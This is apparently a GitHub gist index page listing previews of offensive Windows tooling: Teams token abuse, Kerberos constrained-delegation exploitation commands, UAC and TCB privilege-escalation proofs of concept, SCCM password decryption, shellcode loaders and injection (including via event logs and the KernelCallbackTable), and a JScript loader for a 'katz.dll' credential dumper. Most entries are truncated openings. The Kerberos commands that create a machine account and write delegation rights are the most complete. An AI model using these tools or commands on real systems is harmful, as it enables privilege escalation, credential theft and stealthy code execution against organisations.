analyticsearch
analyticsearch
/ teams_send_message_pwnd.ps1
Created
October 18, 2022 21:17
— forked from mpgn/teams_send_message_pwnd.ps1
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # original code from Connor Peoples / https://twitter.com/NoUselessTech | |
| # modified for cme @mpgn_x64 POC | |
| $Token = "skypetoken=YOUR_TOKEN" | |
| $Header = @{ | |
| authentication = $Token | |
| "content-type" = "application/json" | |
| "x-ms-client-request-id" = [guid]::NewGuid().ToString() |
analyticsearch
/ kerberos_only.ps1
Created
October 11, 2022 15:29
— forked from notsoshant/kerberos_only.ps1
Commands to exploit Kerberos Only Constrained Delegation
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Add Machine account | |
| New-MachineAccount -MachineAccount STRANGE -Password $(ConvertTo-SecureString 'Strange@123' -AsPlainText -Force) | |
| # Add STRANGE$ in msDS-AllowedToActOnBehalfOfOtherIdentity attribute of QUARK$ | |
| $S4UIdentity = "COSMOS\STRANGE$" | |
| $IdentitySID = ((New-Object -TypeName System.Security.Principal.NTAccount -ArgumentList $S4UIdentity).Translate([System.Security.Principal.SecurityIdentifier])).Value | |
| $SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList "O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;$($IdentitySID))" | |
| $SDBytes = New-Object byte[] ($SD.BinaryLength) | |
| $SD.GetBinaryForm($SDBytes, 0) |
analyticsearch
/ SCMUACBypass.cpp
Created
September 10, 2022 14:16
— forked from tyranid/SCMUACBypass.cpp
Simple application to change the SCM APIs to use Kerberos for local authentication to bypass UAC.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // This modifies the authentication to the local SCM to use Kerberos to abuse | |
| // a UAC bypass through Kerberos tickets. | |
| // See https://www.tiraniddo.dev/2022/03/bypassing-uac-in-most-complex-way.html | |
| #define SECURITY_WIN32 | |
| #include <windows.h> | |
| #include <sspi.h> | |
| #include <security.h> | |
| #include <stdio.h> | |
| #include <string> |
analyticsearch
/ TcbElevation.cpp
Created
September 10, 2022 14:16
— forked from antonioCoco/TcbElevation.cpp
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // TcbElevation - Authors: @splinter_code and @decoder_it | |
| #define SECURITY_WIN32 | |
| #include <windows.h> | |
| #include <sspi.h> | |
| #include <stdio.h> | |
| #pragma comment(lib, "Secur32.lib") | |
| void EnableTcbPrivilege(BOOL enforceCheck); |
analyticsearch
/ sccmdecryptpoc.cs
Created
July 3, 2022 21:00
— forked from xpn/sccmdecryptpoc.cs
SCCM Account Password Decryption POC
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Twitter thread: https://twitter.com/_xpn_/status/1543682652066258946 (was a bit bored ;) | |
| // Needs to be run on the SCCM server containing the "Microsoft Systems Management Server" CSP for it to work. | |
| using System; | |
| using System.Collections.Generic; | |
| using System.Runtime.InteropServices; | |
| namespace SCCMDecryptPOC | |
| { | |
| internal class Program |
analyticsearch
/ EventLogInject.cs
Created
May 8, 2022 15:46
POC to inject and extract shellcode from Windows Event Logs
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Collections.Generic; | |
| using System.Diagnostics; | |
| using System.Linq; | |
| using System.Runtime.InteropServices; | |
| using System.Text; | |
| using System.Threading.Tasks; | |
| namespace HiddenEventLogs | |
| { |
analyticsearch
/ AltPidFinder.cpp
Created
May 6, 2022 06:21
— forked from antonioCoco/AltPidFinder.cpp
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "Windows.h" | |
| #include "stdio.h" | |
| #include "strsafe.h" | |
| #include "winternl.h" | |
| #define STATUS_INFO_LENGTH_MISMATCH 0xC0000004 | |
| typedef struct _FILE_PROCESS_IDS_USING_FILE_INFORMATION | |
| { | |
| ULONG NumberOfProcessIdsInList; |
analyticsearch
/ Dynamic_PInvoke_Shellcode.cs
Last active
April 8, 2022 15:37
— forked from bohops/Dynamic_PInvoke_Shellcode.cs
Dynamic_PInvoke_Shellcode.cs
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| //original runner by @Arno0x: https://github.com/Arno0x/CSharpScripts/blob/master/shellcodeLauncher.cs | |
| using System; | |
| using System.Runtime.InteropServices; | |
| using System.Reflection; | |
| using System.Reflection.Emit; | |
| namespace ShellcodeLoader | |
| { | |
| class Program |
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'C:\\Tools'; | |
| try { | |
| var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="AllTheThings" version="0.0.0.0"/> <file name="katz.dll"> <comClass description="AllTheThings Class" clsid="{89565276-A714-4a43-912E-978BFEEDACDC}" threadingModel="Both" progid="AllTheThings"/> </file> </assembly>'; | |
| var ax = new ActiveXObject("Microsoft.Windows.ActCtx"); | |
| ax.ManifestText = manifest; | |
| // Create Base64 Object, supports encode, decode | |
| var Base64={characters:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(a){Base64.characters;var r="",c=0;do{var e=a.charCodeAt(c++),t=a.charCodeAt(c++),h=a.charCodeAt(c++),s=(e=e||0)>>2&63,A=(3&e)<<4|(t=t||0)>>4&15,o=(15&t)<<2|(h=h||0)>>6&3,B=63&h;t?h||(B=64):o=B=64,r+=Base64.characters.charAt(s)+Base64.characters. |
analyticsearch
/ kernelcallback.cs
Created
January 1, 2022 09:57
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| using System; | |
| using System.Runtime.InteropServices; | |
| using System.Text; | |
| namespace SendMessageKernelCallback | |
| { | |
| /*References: | |
| * 1. https://t0rchwo0d.github.io/windows/Windows-Process-Injection-Technique-KernelCallbackTable/ | |
| * 2. https://modexp.wordpress.com/2019/05/25/windows-injection-finspy/ | |
| */ |